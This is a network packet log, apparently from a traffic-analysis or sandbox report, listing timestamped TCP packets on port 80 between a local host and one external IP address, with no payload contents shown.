Sep 28, 2024 21:26:10.146038055 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:10.146090031 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:10.146100998 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:10.146110058 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:10.146141052 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:10.146188021 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:10.146198988 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:10.146210909 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:10.146256924 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:10.146361113 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:10.146369934 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:10.146378994 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:10.146388054 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:10.146399975 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:10.146409988 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:10.146419048 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:10.146419048 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:10.146421909 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:10.146445990 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:10.146462917 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:10.146660089 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:10.146670103 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:10.146678925 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:10.146697998 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:10.146709919 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:10.146711111 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:10.146722078 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:10.146737099 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:10.146738052 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:10.146737099 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:10.146754026 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:10.146765947 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:10.146765947 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:10.146785975 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:10.146816015 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:10.147110939 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:10.147120953 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:10.147130013 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:10.147140026 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:10.147150993 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:10.147152901 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:10.147161961 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:10.147178888 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:10.147208929 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:10.147208929 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:10.147407055 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:10.147418022 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:10.147427082 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:10.147435904 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:10.147444010 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:10.147454023 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:10.147454023 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:10.147489071 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:10.147489071 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:10.147663116 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:10.147672892 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:10.147681952 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:10.147691965 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:10.147700071 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:10.147715092 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:10.147723913 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:10.147723913 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:10.147758007 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:10.147758007 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:10.147919893 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:10.147931099 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:10.147975922 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:10.147984028 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:10.147994995 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:10.148034096 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:10.164892912 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:10.164953947 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:10.164963961 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:10.164997101 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:10.165030003 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:10.165087938 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:10.165097952 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:10.165106058 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:10.165115118 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:10.165127039 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:10.165141106 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:10.165141106 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:10.165173054 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:10.165333986 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:10.165344000 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:10.165352106 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:10.165370941 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:10.165376902 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:10.165383101 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:10.165394068 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:10.165400982 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:10.165405035 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:10.165417910 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:10.165421009 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:10.165441990 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:10.165472031 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:10.165755033 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:10.165766001 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:10.165806055 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:10.165821075 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:10.165874004 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:10.165910959 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:10.165920973 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:10.165929079 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:10.165937901 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:10.165946960 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:10.165956974 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:10.165962934 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:10.165996075 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:10.165996075 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:10.166160107 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:10.166198015 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:10.166207075 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:10.166208982 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:10.166217089 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:10.166233063 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:10.166264057 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:10.195307970 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:10.195374966 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:10.195420980 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:10.195429087 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:10.195437908 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:10.195462942 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:10.195497036 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:10.494112015 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:10.494179964 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:10.541593075 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:10.541604996 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:10.541721106 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:10.541731119 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:10.541872025 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:11.276690960 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:11.276810884 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:11.354096889 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:11.354149103 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:11.360919952 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:11.361051083 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:11.361061096 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:12.074107885 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:12.074309111 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:12.087140083 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:12.092092991 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:12.804004908 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:12.804106951 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:13.178144932 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:13.183146954 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:13.907252073 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:13.907341957 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:14.105475903 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:14.110419989 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.327686071 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.327728987 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.327738047 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.327749014 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:14.327784061 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.327788115 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:14.327826977 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.327827930 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:14.327838898 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.327872038 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:14.327905893 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:14.327930927 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.327943087 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.327986002 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:14.328012943 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.328023911 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.328072071 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:14.328142881 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.328154087 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.328166962 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.328198910 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:14.328221083 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:14.328227043 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.328294992 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:14.452121973 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.452197075 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.452207088 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.452218056 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:14.452220917 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.452233076 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.452244997 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:14.452295065 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:14.452311039 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.452353001 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:14.452390909 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.452402115 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.452410936 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.452420950 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.452430010 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.452440977 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:14.452466965 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:14.452564001 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.452614069 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:14.452692986 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.452702999 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.452713013 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.452721119 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.452730894 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.452739954 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.452744007 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:14.452779055 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:14.452780008 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:14.452987909 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.452997923 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.453002930 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.453007936 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.453016043 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.453027010 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.453037024 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.453049898 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.453057051 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:14.453082085 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:14.453108072 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:14.544683933 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.544769049 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.544806957 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:14.544841051 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:14.576426029 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.576462030 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.576505899 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:14.576529026 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:14.576550007 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.576561928 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.576586008 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.576596975 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.576600075 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:14.576632977 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:14.576708078 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.576719999 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.576762915 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:14.576833963 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.576845884 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.576855898 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.576867104 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.576879025 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.576894999 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:14.576894999 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:14.576936007 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:14.577049017 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.577100039 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:14.577153921 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.577164888 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.577174902 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.577187061 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.577197075 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.577208996 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.577210903 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:14.577241898 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:14.577290058 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:14.577447891 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.577460051 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.577470064 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.577480078 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.577491045 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.577501059 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.577510118 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:14.577514887 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.577548981 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:14.577579975 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:14.577759027 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.577770948 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.577784061 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.577794075 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.577805996 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.577816010 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:14.577817917 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.577837944 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:14.577867031 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:14.578063011 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.578074932 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.578084946 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.578094959 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.578121901 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:14.578154087 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:14.578222036 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.578233957 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.578244925 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.578283072 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:14.578283072 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:14.578327894 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.578339100 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.578349113 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.578360081 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.578370094 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.578382969 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.578397989 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.578398943 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:14.578408957 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.578422070 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.578423977 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:14.578445911 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:14.578461885 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:14.578805923 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.578818083 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.578861952 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:14.700726032 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.700747013 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.700754881 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.700897932 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:14.700932980 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.700943947 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.700959921 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.700972080 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.700982094 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.700990915 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:14.701003075 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.701014042 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:14.701014996 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.701025009 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.701030970 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:14.701036930 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.701071024 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:14.701091051 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:14.701184988 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.701236010 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:14.701267958 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.701277971 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.701287031 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.701333046 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:14.701333046 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:14.701396942 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.701406956 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.701416016 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.701426029 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.701442003 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.701457024 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:14.701493025 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:14.701493025 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:14.701617956 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.701628923 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.701637030 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.701644897 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:14.701673985 CEST	49732	80	192.168.2.4	185.215.113.37
